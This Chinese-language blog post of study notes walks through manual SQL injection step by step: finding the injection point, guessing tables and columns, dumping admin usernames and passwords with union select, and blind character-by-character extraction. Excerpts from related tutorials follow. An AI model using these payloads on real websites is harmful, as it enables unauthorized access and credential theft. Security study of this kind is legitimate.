sql手動注入

2021-09-09 07:27:51 字數 1191 閱讀 2840

第一步:判斷環境,尋找注入點

確定注入點:用』報錯就有注入的希望 and 1=1 正常 and 1=2 報錯就基本能注入

第二步:猜解表名檢測是否存在admin表,正確存在,返回錯誤則不存在

and exists (select * from admin)

第三步:猜解字段

order by字段長度猜解資料庫存在多少資料表

order by 1 返回正常

order by 2 返回正常

order by 3 返回錯誤,說明有2個字段

如45正確,46錯誤,則有45個表

and 1=2 union select 1,2,3,4,5,6…,45 from admin 爆出內容 4,8

再猜 賬號密碼

and 1=2 union select 1,2,3,adminname,5,6,7,password,9,10,… from admin

猜出 賬號密碼

and exists (select 字段 from 表名)

and exists (select admin_name from admin)

第四步:字段長度len引數提取欄位的長度()內的admin_name是欄位名,>0可以換成1,2,3…只到猜中欄位的長度

and (select top 1 len(字段) from 表名)>0

and (select top 1 len(admin_name) from admin)>0

如》4正常,>5頁面錯誤 用=5測試正常 說明admin_name的長度是5位

第五步:折半法猜出admin pass內容重要的一環

and (select top 1 asc(mid(字段,1,1))from 表名)>0

and (select top 1 asc(mid(admin_admin,1,1))from admin)>0 猜解第1位

and (select top 1 asc(mid(admin_admin,2,1))from admin)>0 猜解第2位

SQL 手動注入

web安全攻防 學習筆記 1.1 介紹 sql 注入 sql 注入就是指 web 應用程式對使用者輸入資料的合法性沒有判斷,前端傳入後端的引數是攻擊者可控的,並且引數代入資料庫查詢,攻擊者可以通過構造不同的 sql 語句來實現對資料庫任意操作。sql 注入漏洞的產生需要滿足兩個條件 1.2 注入的危...

sql手動注入經驗總結

總結了一下sql幾個注入的基本思路和用法,現來分享一下 如何判斷有無注入 and1 2 步驟 1 找注入點 id 1等等 2 通過order by 找出一共有多少列數。報錯數字前乙個 id 1 order by 3 前面不用加and 3 利用union select 1,2,3 一般用null取代 ...

使用burpsuite進行手動sql注入

sql注入是乙個web安全漏洞,它使攻擊者能夠干擾應用程式對其資料庫的查詢。通常,它使攻擊者可以檢視他們通常無法檢索的資料。成功的sql注入攻擊可能導致未經授權訪問敏感資料,例如密碼,信用卡詳細資訊或個人使用者資訊。1 檢索隱藏的資料,您可以在其中修改sql查詢以返回其他結果。2 顛覆應用程式邏輯,...